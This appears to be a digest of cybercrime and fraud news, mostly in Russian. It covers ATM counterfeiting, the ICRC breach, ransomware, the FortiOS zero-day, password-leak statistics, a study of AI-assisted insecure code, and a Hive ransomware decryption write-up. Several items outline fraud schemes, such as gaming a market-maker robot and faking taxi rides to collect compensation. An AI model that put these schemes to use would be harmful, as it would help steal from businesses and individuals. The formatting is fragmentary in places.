Источники Telegram-канала Baza пояснили, что аферисты выяснили, какие именно банкоматы организации принимают купюры определенного образца, а потом подготовили фальшивые наличные в большом количестве. Они успели положить в банкоматы 12,3 тыс. купюр и снять их в другом месте до возникновения ситуации, когда ИБ-банка заметила странную активность в банкоматах и заблокировала работу устройств на приём денег и дальнейшие операции по этим счетам. Но было поздно. Мошенники действовали очень активно и сняли почти все ранее внесенные деньги в других местах. В итоге внесенные ими ранее 75 тыс. рублей (15 купюр по 5 тыс. рублей) преступники обналичить не смогли из-за блокировки со стороны банка.
Эксперты пояснили, что организация обратилась в полицию по данному инциденту. Правоохранительные органы возбудили дело о мошенничестве в особо крупном размере. Пока неизвестно, удалось ли задержать мошенников, также непонятно, есть у банка информация, которая поможет в этом.
В апреле этого года банки попросили ЦБ отложить ввод новых банкнот из-за санкций, так как ряд зарубежных поставщиков банкоматов, например, Diebold Nixdorf и NCR, прекратили предоставлять услуги в России. При этом этих банкоматов в российских банках — более 60%. Кассовая техника, которую используют для обработки банкнот, на 100% импортная. Более половины многокарманных счетно-сортировальных машин, используемых в России, произвели в Германии и Японии. «С уходом поставщиков стали невозможными любые обновления программного обеспечения валидаторов в модулях рециркуляции/приема наличных банкоматов, а также кассовой техники, терминалов, что приводит к отсутствию возможности добавления/изменения шаблонов купюр как новых номиналов, так и нового образца», — пояснили ЦБ представители банков.
Международный комитет Красного Креста(МККК) заявил о готовности к диалогу с хакерами, которые совершили кибератаку на его базу данных, содержащую конфиденциальные сведения о более чем 515 тыс. человек, включая лиц, разделенных со своими семьями из-за вооруженных конфликтов. Генеральный директор гуманитарной организации Роберт Мардини заявил в четверг вечером в выпуске новостей швейцарской телекомпании Эр-тэ-эс, что МККК намерен разъяснить тем, кто совершил взлом системы, что информация в этой базе данных имеет "защищенный статус".
"Мы готовы напрямую и анонимно общаться с теми, кто это совершил, кем бы они ни были, чтобы проинформировать их о защищенном статусе этих сведений", - сказал Мардини. Он подчеркнул, что речь не идет о выплате выкупа, поскольку МККК "никогда его не платит".
Отвечая на вопрос о том, сколь велик нанесенный хакерской атакой организации ущерб, гендиректор сказал: "На настоящий момент у нас нет точных оценок, кто стоит за этой атакой, и мы все еще анализируем размер урона". Красный Крест приостановил доступ в базу данных, чтобы "ограничить последствия атаки". Вместе с тем МККК в настоящее время "делает все возможное" для продолжения оказания помощи семьям, разделенным со своими близкими.
В среду женевская штаб-квартира Красного Креста сообщила о кибератаке на его хранилище информации. Мишенью стала расположенная в Швейцарии компания, с которой у МККК есть контракт на хранение данных. Эти действия, по словам МККК, "поставили под угрозу сведения о более чем 515 тыс. очень уязвимых людей, включая тех, кто был разделен со своими семьями вследствие конфликта, миграции и бедствия", а также о без вести пропавших лицах, их семьях и тех, кто содержится в заключении. Эти сведения поступили ранее из "не менее чем 60 национальных обществ Красного Креста и Красного Полумесяца".
МККК выразил обеспокоенность потенциальным риском предания огласке сведений о людях, которых общества Красного Креста и Красного Полумесяца "стремятся защитить и оказать помощь им и их семьям". Руководство организации призвало совершивших кибератаку лиц не публиковать данные, к которым они могли получить доступ, а также не продавать их и не использовать каким-либо иным образом.
О случае сообщает пресс-служба СБУ в Одесской области. По их информации, 36-летний разраб из Одессы предлагал свои услуги на форумах и в различных телеграм чатах. Стоимость месячного доступа к ратнику - 1500$.
Файлы вируса были замаскированы под различные мобильные приложения. При установке на телефон покупатель получал полный удаленный доступ к банкингу, мессенджерам и другим приложениям. Кроме того, с телефонов можно было дистанционно звонить или принимать звонки, производить прямые эфиры с камер мобилы.
Во время шмона по хатам будущего арестанта стражи порядка обнаружили и изъяли мобильники, компьютеры с образцами подобных программ. Пока что кодеру впаивают только ст. 361-1 ч.2 . Ему грозит до 5 лет за решеткой.
Статья 361-1 ч.2: Создание с целью противоправного использования, распространения или сбыта вредоносных программных или технических средств, а также их распространение или сбыт.
t.me/SSU_Odesa/9777
gp.gov.ua/ua/posts/zbuvav-virus-do-telefoniv-yakii-dozvolyav-vtrucatisya-v-
onlain-banking-ta-vidstezuvati-listuvannya-vikrito-xakera
Группа ALPHV ransomware продолжает набирать обороты, атакуя местные органы власти в США. Последние сообщения направлены на Уайтхолл, штат Огайо, небольшой город в 6,6 милях к востоку от столицы штата Колумбуса.
Все чаще люди, отправляясь по обычным повседневным делам - в школу, больницу или аптеку, сталкиваются с неработающими компьютерными системами. За этими инцидентами нередко стоят преступные группировки из разных уголков планеты, блокирующие системы и требующие выкуп за восстановление доступа или возврат похищенных данных.
Эпидемия программ-вымогателей не показывает признаков замедления в 2024 году, несмотря на усилия правоохранительных органов, и эксперты опасаются, что вскоре она может перейти в более жестокую фазу. «Мы определенно проигрываем борьбу с шифровальщиками сейчас», — говорит аналитик по угрозам компании Recorded Future Аллан Лиска.
Программы-вымогатели могут стать определяющим киберпреступлением последнего десятилетия, атакуя широкий круг жертв, включая больницы, школы и правительства. Злоумышленники шифруют критически важные данные, останавливая работу жертвы, а затем вымогают деньги, угрожая обнародованием конфиденциальной информации. Эти атаки имеют серьёзные последствия. В 2021 году компания Colonial Pipeline стала жертвой атаки программ-вымогателей, что вынудило её приостановить поставки топлива и заставило президента США Джо Байдена принять экстренные меры для удовлетворения спроса. Однако атаки программ-вымогателей происходят ежедневно по всему миру - на прошлой неделе они нанесли удар по больницам в Великобритании. Многие из них даже не попадают в заголовки новостей.
«Существует проблема с прозрачностью – большинство организаций не раскрывают и не сообщают о подобных инцидентах», – отмечает аналитик по угрозам компании Emsisoft Бретт Кэллоу. По его словам, это затрудняет оценку динамики роста атак-вымогателей. Исследователям приходится полагаться на данные госучреждений, подвергшихся атакам, или самих преступников.
Судя по всему, проблема не только не исчезнет, но и обострится в 2024 году. Согласно [отчету](https://cloud.google.com/blog/topics/threat- intelligence/ransomware-attacks-surge-rely-on-public-legitimate-tools) Mandiant , хакеры все чаще прибегают к публикации похищенных данных на так называемых «сайтах позора». В 2023 году количество публикаций на таких ресурсах выросло на 75% по сравнению с 2022 годом. Эти сайты используют броские тактики, такие как обратный отсчёт до момента, когда конфиденциальные данные жертв будут обнародованы, если они не заплатят.
«Их тактики становятся всё более жестокими», — говорит Кэллоу.
Например, хакеры начали напрямую угрожать жертвам устрашающими телефонными звонками или электронными письмами. В 2023 году Онкологический центр Фреда Хатчинсона в Сиэтле подвергся атаке-вымогателя, в результате которой пациентам с онкологическими заболеваниями рассылались электронные письма с угрозами обнародовать их личную информацию в случае отказа от оплаты.
«Меня беспокоит, что это очень скоро может перейти в реальное насилие», – опасается Кэллоу. «Если речь идет о миллионах долларов, они могут причинить вред руководителю компании, которая отказывается платить, или членам его семьи».
Хотя пока не было зарегистрировано случаев насилия в результате атак- вымогателей, хакерские группировки уже используют подобные угрозы в своей тактике. «В ходе переговоров, которые просочились в сеть, они намекали на подобные действия, заявляя: "Мы знаем, где живет ваш генеральный директор"», – рассказывает Лиска.
Говоря о бесчувственном подходе преступников к жизни и смерти, стоит отметить, что, по оценкам исследователей, с 2016 по 2021 годы атаки программ-вымогателей привели к смерти от 42 до 67 пациентов Medicare из-за задержек с оказанием жизненно важной помощи.
Аналитики также обеспокоены связями между группировками, специализирующимися на атаках-вымогателях, и «The Comm» – неформальной международной сетью преступников, которые предлагают услуги по противоправным действиям онлайн, помимо традиционных киберпреступлений, такими как подмена SIM-карты. Участник Comm рекламируют свою готовность применять физическую силу, повреждать имущество и выкладывать видео, якобы изображающие акты жестокого обращения
В последнее время правоохранительные органы добились некоторых успехов в пресечении деятельности группировок, занимающихся атаками-вымогателями. Например, в феврале международная операция «Cronos» ликвидировала известную хакерскую группу LockBit, конфисковав их веб-сайты и предложив жертвам бесплатную расшифровку данных.>
Трудность в снижении объёмов атак программ-вымогателей отчасти заключается в том, что банды вымогателей — которые работают почти как стартапы, иногда предлагая услугу подписки и круглосуточную поддержку своего программного обеспечения, одновременно привлекая участников для проведения атак — часто базируются в странах, недоступных для высылки. Это побудило западные правоохранительные органы использовать тактики запугивания и психологические игры самих банд против них.
Например, операция «Кронос» использовала таймер обратного отсчёта в стиле сайта позора, чтобы раскрыть личность предполагаемого босса LockBit, 31-летнего гражданина Дмитрия Хорощёва . Ему также предъявили обвинения по 26 пунктам, выдвинутым американскими прокурорами, и наложили санкции. Хотя его арест в стране пребывания маловероятен, раскрытие личности может подорвать доверие к нему и сделать его мишенью.
«Найдутся люди, готовые применить силу, чтобы доставить его через границу в страну, откуда его можно будет экстрадировать». Сообщники также могут беспокоиться о возможности его ареста, если он добровольно покинет страну своего пребывания.
Ещё одной преградой на пути к контролю над программами-вымогателями является гидра-образная природа участников. После нейтрализации LockBit аналитики заметили, что почти сразу появилось 10 новых сайтов, распространяющих шифровальщики. «Это беспрецедентное число за месяц», – констатирует Лиска.
Но правоохранители адаптируются и к этом. В мае международная операция под названием «Endgame» объявила, что ей удалось прервать работу нескольких групп, распространяющих вредоносное ПО, известное как «дропперы». Дропперы являются важной частью экосистемы киберпреступлений, так как позволяют хакерам незаметно доставлять программы-вымогатели или другой вредоносный код. Операция «Endgame» привела к аресту четырёх человек в Армении и Украине, закрытию более 100 серверов и захвату тысяч доменов. «Endgame» использовала психологические тактики, подобные операции «Кронос», такие как обратный отсчёт до видеороликов с текстом, призывающих преступников «подумать о следующем шаге».
Несмотря на масштабы проблемы, Лиска и Кэллоу не теряют оптимизма. Кэллоу полагает, что запрет на выплату выкупа хакерам стал бы самым эффективным решением. Лиска менее уверен в перспективах запрета, но отмечает, что действия правоохранительных органов могут со временем привести к реальным результатам.
«Мы часто говорим о "игре в крота", когда речь идёт о группах вымогателей — одну уничтожишь, появляется другая», — говорит Лиска. «Но я думаю, что [правоохранительные] операции постепенно сужают поле. В конечном итоге, надеюсь, их будет появляться всё меньше и меньше».
• Source: securitylab.ru/news/549109.php
A zero-day vulnerability in FortiOS SSL-VPN was exploited by "unknown actors"
in attacks targeting the government and other government-related
organizations.
It's a heap-based buffer overflow flaw that allows hackers to remotely
execute malicious code.
Fortinet didn’t disclose the vulnerability until December 12, when it warned
that the vulnerability was under active exploit against at least one of its
customers.
Sources:
https://xakep.ru/2022/12/13/fortios-ssl-vpn-bug/

Organizations ](https://thehackernews.com/2023/01/fortios-flaw-exploited-as- zero-day-in.html)
A vulnerability in FortiOS SSL-VPN was exploited by hackers as a zero-day to attack government agencies and large organizations before Fortinet fixed
 thehackernews.com

(CVE-2022-42475) - Help Net Security ](https://www.helpnetsecurity.com/2023/01/13/cve-2022-42475-exploited/)
CVE-2022-42475 has been exploited by attackers to compromise governmental or government-related targets, the company has shared.
 www.helpnetsecurity.com

customers ](https://arstechnica.com/information-technology/2023/01/fortinet- says-hackers-exploited-critical-vulnerability-to-infect-vpn-customers/)
Remote code-execution bug was exploited to backdoor vulnerable servers.
arstechnica.com
Эксперты российского сервиса разведки утечек данных и мониторинга даркнета Data Leakage & Breach Intelligence (DLBI) [представили](https://dlbi.ru/five- billion-password-2022/) анализ утёкших учётных записей и паролей за 2022 год. В отчёте проанализировано 5,47 млрд уникальных учётных записей, основной упор был сделан на пароли. В тройку самых популярных паролей среди всех изученных ресурсов за 2022 год попали: «a123456», «123456» и «123456789». В русскоязычном сегменте самыми популярными паролями стали «33112211», «123456» и «1q2w3e4r».
Источниками анализируемых данных стали различные сообщества, занимающиеся восстановлением паролей из хешей (например, hashmob.net), теневые форумы и Telegram-каналы, публикующие утечки. DLBI очищает данные от «мусора» (пустых и повторяющихся записей), выявляет и дисквалифицирует автоматически сгенерированные пароли и массовые автоматические регистрации. Кириллические символы приводятся к единой кодировке.
В исследование попали следующие крупные утечки 2022 года (цифры в списке это не размер утечки, допущенной тем или иным сервисом, а количество учётных записей, доступных на момент исследования):
На момент исследования в базе паролей сервиса находилось 5 471 135 296 паролей, из которых:
• около 924,4 млн паролей содержат только цифры;
• около 1,4 млрд паролей содержат только буквы;
• около 14,5 млн паролей содержат буквы кириллического алфавита;
• около 201,7 млн паролей содержат буквы, цифры и спецсимволы;
• около 3,5 млрд паролей содержат 8 и более символов;
• около 907,8 млн паролей содержат более 10 символов;
• около 1,1 млд паролей содержат менее 7 символов.
10 самых популярных паролей из утечек только за 2022 год
Также экспертами было проанализировано 1 500 547 458 утёкших учётных записей из зоны «РУ» (в доменных зонах .ru и .рф).
10 самых популярных паролей зоны «РУ» из утечек 18,364,083 (годом ранее — 30,234,882) записей только за 2022 год
10 самых популярных паролей, содержащих только буквы
10 самых популярных паролей, содержащих буквы, цифры и спецсимволы
10 самых популярных кириллических паролей
Полный набор данных исследования изложен в [статье](https://dlbi.ru/five- billion-password-2022/) DLBI.
Группа исследователей из Стэнфордского университета изучила влияние использования интеллектуальных помощников при написании кода на появление в коде уязвимостей. Рассматривались решения на базе платформы машинного обучения OpenAI Codex, такие как GitHub Copilot, позволяющие формировать достаточно сложные блоки кода, вплоть до готовых функций. Опасения связаны с тем, что так как для тренировки модели машинного обучения использован реальный код из публичных репозиториев GitHub, в том числе содержащий уязвимости, синтезированный код может повторять ошибки и предлагать код, в котором присутствуют уязвимости, а также не учитывать необходимость выполнения дополнительных проверок при обработке внешних данных.
К проведению исследования были привлечены 47 добровольцев, имеющих разный опыт в программировании - от студентов, до профессионалов с десятилетним опытом. Участники были разделены на две группы - экспериментальная (33 человека) и контрольная (14 человек). Обе группы имели доступ к любым библиотекам и интернет-ресурсам, в том числе могли использовать готовые примеры со Stack Overflow. Экспериментальной группе была предоставлена возможность использования AI-ассистента.
Каждому участнику было дано 5 заданий, связанных с написанием кода, в котором потенциально легко допустить ошибки, приводящие к уязвимостям. Например, были задания по написанию функций шифрования и расшифровки, использованию цифровых подписей, обработке данных, участвующих в формировании файловых путей или SQL- запросов, манипуляции с большими числами в коде на языке Си, обработке ввода, отображаемого в web-страницах. Для рассмотрения влияния языков программирования на безопасность кода, получаемого при использовании AI- ассистентов, задания охватывали языки Python, Си и JavaScript.
В итоге было выявлено, что участники, использовавшие интеллектуальный AI- ассистент на базе модели codex-davinci-002, подготовили значительно менее безопасный код, чем участники, которые не пользовались AI-ассистентом. В общем виде только 67% участников группы, использовавшей AI-ассистент, смогли предоставить корректный и безопасный код, в то время как в другой группе этот показатель составил 79%.
При этом показатели самооценки были обратными - участники пользовавшиеся AI- ассистентом считали, что их код будет более безопасным, чем у участников из другой группы. Кроме того, было отмечено, что участники, которые меньше доверяли AI-ассистенту и больше тратили времени на разбор выдаваемых подсказок и вносили в них изменения, допустили меньше уязвимостей в коде.
Например, код скопированный из криптографических библиотек содержал более безопасные значения параметров по умолчанию, чем код, предложенный AI- ассистентом. Также при использовании AI-ассистента фиксировался выбор менее надёжных алгоритмов шифрования и отсутствие проверок подлинности возвращаемых значений. В задании, связанном с манипуляцией числами на языке Си, в коде, написанном с использованием AI-ассистента, было допущено больше ошибок, приводящих к целочисленному переполнению.
Дополнительно можно отметить похожее исследование группы из Нью-Йоркского университета, проведённое в ноябре с привлечением 58 студентов, которым было предложено реализовать на языке Си структуру для обработки списка покупок. Полученные результаты показали незначительное влияние AI-ассистента на безопасность кода - пользователи, которые применяли AI-ассистент, в среднем допустили примерно на 10% больше ошибок, связанных с безопасностью.
Следственный комитет России возбудил уголовное дело против двоих российских инвесторов, сумевших обмануть алгоритмы зарегистрированного в США маркетмейкера (робота, поддерживающего торги активными и позволяющего совершать сделки даже в отсутствие живых контрагентов). По данным РБК, их суммарный доход за три месяца составил 154,6 миллиона рублей.
Подозреваемые с фамилиями Зинченко и Кулешов, а также неустановленная финансовая организация манипулировали ценами на иностранные акции с помощью торгового робота американской компании W-Empirical Holding, выступавшей брокером по договору с «Фридом Финанс» (ушли из России в 2022 году). Кулешов открывал на свое имя брокерские счета и выводил с них деньги, получая от Зинченко по 30 тысяч рублей ежемесячно и выполняя тем самым функции дропа.
После получения аккаунтов Зинченко совершил от имени Кулешова несколько десятков сделок, позволяющих, как говорится в материалах уголовного дела, «путем обмана искусственно инициировать срабатывание алгоритма в сделках как на покупку, так и на продажу ценных бумаг, таким образом привлекая в качестве стороны фиктивнои сделки W-Empirical Holding». Логика была следующей: сначала с помощью аффилированных счетов Зинченко выставлял встречные заявки, которые сбивали стоимость ценных бумаг, после чего маркетмейкер продавал весь портфель по заниженной цене. После этого он же другими небольшими фиктивными сделками разгонял цену и продавал те же самые акции и бумаги маркетмейкеру, но уже значительно дороже.
«Предположим, человек с одного своего счета делает заявку на покупку 100 акций по цене 50 рублей, а с другого счета делает предложение о продаже 1000 акций по цене 50 рублей или меньше/больше (при реальной цене на них 80 рублей). Система вычисляла, что акций предложено много, при этом спрос на них низкий — цена предложения 50 рублей, и по такой цене желающих купить акции немного, — и устанавливала цену акции 50 рублей», — раскрывает детали схемы специальный советник по корпоративным вопросам КА Pen & Paper Наталья Бунина.
В соответствии с биржевым регламентом, разница в стоимости покрывалась за счет собственных средств W-Empirical Holding. Таким образом, речь идет именно о хищении средств. Зинченко проворачивал аферу с февраля по май 2022 года, при этом сам он покинул Россию в марте того же года и его местонахождение неизвестно. При этом из всей украденной суммы Зинченко успел вывести на свои счета лишь 58,5 миллиона рублей. Еще около 96 миллионов были заблокированы «Фридом Финанс» из-за начавшегося разбирательства. Даже при этом автор схемы остался в жирном плюсе — его первоначальные вложения составили 14 миллионов рублей. Обвинения соучастникам выдвинуты по ч. 4 ст. 159 УК РФ (мошенничество, совершенное организованной группой лиц).
Сотрудниками Управления по борьбе с противоправным использованием информационно-коммуникационных технологий ГУ МВД России по г. Санкт-Петербургу и Ленинградской области задержаны пятеро мужчин по подозрению в мошенничестве, совершенном организованной группой в сети Интернет.
Предварительно установлено, что аферисты, действуя по предварительному сговору, в течение полугода использовали программные уязвимости интернет- приложений по заказу такси. Это позволило похитить более 20 миллионов рублей.
«Подозреваемые подбирали из числа знакомых лиц для регистрации в качестве фиктивных водителей такси, оформляли на них аккаунты в приложении. Также создавались подставные профили пассажиров. В отдалённый район Ленинградской области вызывалась машина, имитировалась ее подача. Далее мнимые пассажиры отказывались от поездки, в результате чего, согласно правилам сервисов, на аккаунт водителя компенсировалась стоимость подачи.
К участию в криминальной схеме было привлечено 34 человека, проживающих в различных регионах. За вознаграждение они давали согласие на использование своих данных для регистрации профилей таксистов в приложении», - рассказала официальный представитель МВД России Ирина Волк.
В ходе обысков по местам проживания задержанных были обнаружены и изъяты мобильные телефоны с информацией, изобличающей противоправную деятельность, ноутбуки, банковские карты, SIM-карты, 700 тысяч рублей.
«Следователем СУ УМВД России по Невскому району г. Санкт-Петербурга возбуждено уголовное дело по признакам преступления, предусмотренного ч. 4 ст. 159 УК РФ. Четверым фигурантам избрана мера пресечения в виде домашнего ареста, одному – в виде подписки о невыезде и надлежащем поведении», - сообщила Ирина Волк.
В Михайловке Волгоградской области в отношении бывшего следователя СКР, который занялся операциями с криптовалютой и обманул 12 человек более чем на 200 миллионов, возбуждено уголовное дело.
Россиянина обвиняют по статье 159 («Мошенничество») УК РФ. Дело возбуждено на основе обращений потерпевших. 12 человек рассказали, что экс-следователь обещал хороший заработок на криптовалюте, а потом исчез с вложенными деньгами.
По словам потерпевших, в начале 2022 года мужчина занялся трейдингом и сделался специалистом по криптовалюте и майнингу. В центре города он открыл офис со значком биткоина и предложил знакомым вложиться. Экс-следователь имел хорошую репутацию, потому многие передали ему крупные суммы без договоров, однако позже забили тревогу — мужчина перестал выходить на связь. Сообщается, что он покинул город и может находиться за пределами страны.
source: v1.ru/text/business/2023/01/30/72015221/
Барабинский районный суд рассмотрел уголовное дело 19-летнего студента колледжа, который продавал банковские карты, оформленные на его имя. Как сообщает Управление судебного департамента, молодой человек за сбыт трёх электронных носителей получил 7000 рублей.
- Гречко Владислав признан виновным в совершении преступления, предусмотренного частью 1 статьи 187 УК РФ (неправомерный оборот средств платежей) Молодого человека приговорили к 6 месяцам лишения свободы условно с испытательным сроком на 6 месяцев, - информирует пресс-служба.
Сибиряк явился с повинной и участвовал в расследовании дела. В связи с этим суд не назначил молодому человеку штраф.
"Данные более 500 тысяч россиян из московского региона, которые покупали поддельные справки о вакцинации и ПЦР-тесты, выставили на продажу на теневых интернет-ресурсах и в Telegram-каналах. Об этом в пятницу, 12 ноября, пишет «Коммерсантъ».
Как рассказал изданию один из продавцов, база из одной тысячи строк стоит 120 долларов (около 8,5 тысячи рублей). В ней содержатся паспортные данные, СНИЛС, номера телефонов, адреса мест жительства, а также информация о датах получения сертификатов.
Программист, владелец Telegram-канала «Глаз бога» Евгений Антипов пояснил, что в базах содержатся данные ОМС россиян, стоимость информации об одном человеке составляет около 30–40 рублей. По мнению Антипова, сведения были собраны в самих сервисах, предлагающих сделать поддельную справку о вакцинации или ПЦР.
Основатель сервиса разведки утечек данных и мониторинга даркнета DLBI Ашот Оганесян полагает, что данные своих клиентов могут продавать и сами создатели таких сайтов. Кроме того, предположил он, мошенники могут использовать данные покупателей для их же шантажа.
Глава группы анализа угроз информационной безопасности Positive Technologies Вадим Соловьев предположил, что мошенники могут предлагать услуги по удалению купивших поддельные сертификаты россиян из таких баз или создавать сервисы, где люди могут проверить свои данные на предмет утечки. Подобного мнения придерживается и директор по стратегическим коммуникациям Infosecurity a Softline company Александр Дворянский."
наркотиков
По данным New Zealand Herald, хакеры украли 45000 новозеландских долларов (или
около 32000 долларов США) в биткойнах из кошелька полиции Новой Зеландии.
Полиция намеревалась использовать биткойны для скрытой контрольной закупки
наркотиков. Однако неизвестная организация получила контроль над ключами,
необходимыми для доступа к кошельку, и похитила криптовалюту.
Полиция до сих пор не знает, кто украл биткойны, хотя детектив-инспектор Стюарт Миллс (Stuart Mills) из Национальной группы по борьбе с организованной преступностью полиции Новой Зеландии говорит, что злоумышленники «вероятно, находятся за границей» и что «преступление было частью более широкого мошенничества, нацеленного на биткойн-кошельки». Расследование того, как преступники получили ключи и куда ушли деньги, продолжается.
Полиция Новой Зеландии не в первый раз работает с криптовалютой. В прошлом году власти Новой Зеландии конфисковали BTC на сумму около 90 миллионов долларов США у Александра Винника (Alexander Vinnik), предполагаемого оператора закрытой в настоящее время криптобиржи BTC-e, который должен отсидеть пять лет тюрьмы за мошенничество с использованием криптовымогателей.
А ещё в конце 2019 года полиция Новой Зеландии конфисковала 4,2 млн долларов в криптовалютах у владельца сайтов по распространению пиратских фильмов.
[Источник](https://www.theblockcrypto.com/linked/110998/hackers- steal-45000-btc-new-zealand-police-wallet-money-laundering- sting?utm_source=ixbtcom)
Федеральный суд присяжных в Гринсборо (штат Северная Каролина) признал 24-летнего американца Реми Сент-Феликса в краже криптовалюты. Ему грозит не менее семи лет тюрьмы, максимальное наказание — пожизненное заключение.
Свои преступления Сент-Феликс и члены его банды совершали в период с сентября 2022 года по июль 2023-го, а их география включала штаты Северная Каролина, Флорида, Техас и Нью-Йорк. Как правило, к жертвам просто вламывались в дома, иногда похищали, а иногда прямо там заставляли под угрозой расправы выдать данные своих криптовалютных счетов.
«Жертвы в этом деле пережили ужасный, болезненный опыт, с которым не должен познакомиться ни один гражданин США, — заявила прокурор Среднего округа Северной Каролины Сандра Хейрстон. — Обвиняемый и его сообщники действовали исключительно из жадности и бессердечно терроризировали тех, на кого они нацелились. Вердикт присяжных по этому делу представляет собой важный шаг в обеспечении справедливости для этих жертв».
В апреле 2023 года Сент-Феликс и его сообщник ворвались в дом очередного американца. Там они напали на нее, связали и держали под дулом пистолета, угрожая еще большим насилием в отношении самой жертвы и ее супруга. В результате члены банды стали богаче на 150 тысяч долларов. Известно, что отмывать деньги они предпочитали с помощью Monero, используя для этого децентрализованные финансовые платформы без KYC-политики.
Главарь группировки был арестован в июле 2023 года в тот момент, когда он направлялся к дому очередной жертвы в Нью-Йорке. Тринадцать его сообщников также достаточно быстро вычислили и задержали. Сент-Феликса судили по девяти пунктам, а свой приговор он узнает 11 сентября.
justice[.]gov/opa/pr/man-convicted-violent-home-invasion-robberies-steal- cryptocurrency
The work done in the last few months has been necessary to reveal the malicious file encryption mechanism of Hive v5-5.2. The work was divided into two parts
Keystream decryption
File decryption using the decrypted keystream
I would like to thank the great @rivitna for the support, dialogue and advices
of these months of work! Please take note of rivitna's github full of useful
informations about Hive ransomware and more.
In this readme you will find some information about the file decryption algorithm, referring you to the PoC for a more complete picture of how it works. A keystream is an encrypted cleartext. A cleartext is a set of 0xA00000 bytes to which the first 0x2FFF00 bytes have been appended, for a total of 0xCFFF00 bytes. These bytes were created with the weak algorithm already discussed in the first part released in July 2022. Here below is an example of cleartext:
clear text
The Hive sample analyzed and referred to in this document was chosen from this list created by @rivitna to which my warmest thanks go. To get an idea of the complexity of ransomware, please take a look at this analysis published by Microsoft Threat Intelligence Center (MSTIC).
File encryption algorithm
The cleartext (a decrypted keystream) is used by Hive ransomware when
encrypting each file. When encrypting a file, Hive ransomware calculates two
integers referring to precise positions in the cleartext (offsets) to be used
to encrypt the file according to the following formula:
formula
where c = i % 0x2FFF00 ed = i % 0x2FFD00 , with i as a byte counter.
The encrypted file extension
The preliminary operations before writing a file are:
Renaming the file using MoveFileExW and changing its extension;
Writing the renamed file with the result of the xor operation shown above.
file_extension
Also in this case, the cleartext plays a fundamental role. In fact it is used for:
Determine the keystream ID (first 6 bytes) using a hash function
Encrypt the positions (offsets) used to extract bytes from the cleartext
However, the first offset is encrypted using a fixed position of the cleartext
and is different for each Hive 5/5.1/5.2 sample. A kind of magical value. In
many Hive 5/5.1 artifacts this magic value is shown explicitly inside a memory
reference, like in this case 0x98072A :
off1
Or this case 0x7539D:
off2
But in the next evidence the for loop is slightly different and has been written in such a way as not to explicit the magic value that we need to identify. This concerns an artifact belonging to Hive 5.2:
off3
In this case it is possible to use the offset bruteforce function present in the released tool, using a file with a known extension and the relative decrypted keystream. Using the header of the encrypted file and the header of the unencrypted file it is possible to understand what is the offset from which the decryptor must start to decrypt the file.
The file encryption mode can have two values: 0xFB or 0xFF
0xFB means that the ransomware encrypted the entire file without leaving any
portion of the file unencrypted.
0xFF means that the ransomware calculated a NCB (not encrypted block) for each
file and encrypting blocks of 0x100000 bytes. For further information
regarding the calculation of the size of the unencrypted blocks and the
cleartext offset, please refer to the PoC code.
Во Львовской области киберполиция разоблачила группу злоумышленников, которые создавали фейковые сайты банков и обворовывали украинцев
По данным следствия, подозреваемые посредством так называемых фишинговых сайтов массово рассылали SMS, в которых писали о возможности "получения помощи" для переселенцев от государства. При этом злоумышленники указывали ссылку на фейковые сайты банковских учреждений.
Таким образом, члены организации получали коды доступа к банковским счетам потерпевших и могли завладеть их средствами.
Правоохранители заблокировали работу фишинговых сайтов, а у подозреваемых провели обыски. Изъяли мобильные телефоны, десятки SIM-карт операторов связи, компьютеры и ноутбуки, электронные накопители информации, банковские карты и наличные деньги на сумму 13,5 тысячи долларов и 1,9 тысячи евро.
Следователи сообщили четырем участникам группы о подозрении в создании преступной организации, несанкционированном вмешательстве в информационные (автоматизированные) системы и мошенничестве. Максимальная санкция статей предусматривает до 15 лет лишения свободы.
18 января на территориях Республики Беларусь и Королевства Испания при поддержке правоохранительных органов США проведена международная полицейская операция по пресечению деятельности трансграничной организованной преступной группы, сообщает пресс-служба МВД.
Задержаны выходцы из разных стран СНГ, которые занимались вещевым кардингом: приобретали дорогостоящие товары в зарубежных интернет-магазинах за счет средств с чужих банковских карт, реквизиты которых покупали в даркнете.
Ущерб от преступной деятельности фигурантов исчисляется сотнями тысяч долларов.
В пресс-службе МВД уточнили, что подробности и результаты международного сотрудничества правоохранителей будут озвучены 20 января на совместной пресс- конференции Министерства внутренних дел и Следственного комитета.
Другие подробности пока не сообщаются.[
• Source: https://t.me/pressmvd/3872
Кроме покупки и майнинга есть и другой способ получить биткоины — украсть их у других.
Именно так поступил один хакер из США, который в течение четырех лет крал биткоины у пользователей разных сайтов и сервисов. Его имя — Терри Монро Дюкетт (Terry Monroe Duquette). Он был арестован в 2022 году по обвинению в мошенничестве, краже личных данных и отмывании денег.
Как он это делал? Он создавал фальшивые сайты, которые выглядели как настоящие, но на самом деле были ловушками для ничего не подозревающих жертв. Он приманивал их обещаниями выгодных сделок с биткоинами или предлагал им бесплатные услуги по хранению и обмену криптовалюты. Когда пользователи вводили свои логины и пароли на этих сайтах, он получал доступ к их кошелькам с биткоинами и переводил их себе.
По данным следствия, он украл более 10 тысяч биткоинов, что по курсу на момент ареста составляло около 500 миллионов долларов. Он также использовал разные способы для скрытия своей личности и отмывания украденных средств. Он пользовался анонимными сервисами для смешивания биткоинов, переводил их в другие криптовалюты и даже покупал за них золотые слитки.
Но его планы были раскрыты благодаря совместной работе американских и европейских правоохранительных органов. Они вычислили его по цифровым следам, которые он оставлял на разных сайтах и сервисах. Они также обнаружили его склад с золотом в штате Вашингтон и конфисковали его имущество.
Сейчас Дюкетту грозит до 20 лет тюрьмы за свои преступления. Его дело стало одним из самых крупных в истории кражи биткоинов.
Два подростка из США и Великобритании организовали так называемую сваттинг- атаку (ложный вызов полиции) с целью заполучить ценный псевдоним в Twitter, что в конечном итоге привело к смерти 60-летнего жителя штата Теннеси Марка Херринга (Mark Herring).
Подростки координировали свои действия через мессенджер Discord. Как сообщила дочь покойного местному телеканалу WKRN-TV, один из подростков, житель Теннеси Шейн Сондерман (Shane Sonderman) собрал всю информацию о Херринге и его семье, включая адреса родных, и разместил ее в чате Discord.
Затем второй подросток, находившийся в Великобритании, организовал вызов полиции, сообщив о ложном преступлении. Все это делалось с целью запугать мужчину и заставить его отдать свой аккаунт @tennessee в Twitter – редкий псевдоним, стоимость которого оценивается в несколько тысяч долларов.
Услышав странное движение возле дома, мужчина вышел с пистолетом в руках. Увидев полицию, он отбросил оружие и поднял руки вверх. В этот момент с ним случился сердечный приступ. Мужчину увезли в больницу, где он вскоре умер.
В настоящее время Сондерман арестован и находится в тюрьме, ему грозит лишение свободы сроком до пяти лет и штраф в размере $250 тыс. Второй злоумышленник находится в Великобритании и не подлежит экстрадиции, поскольку является несовершеннолетним.
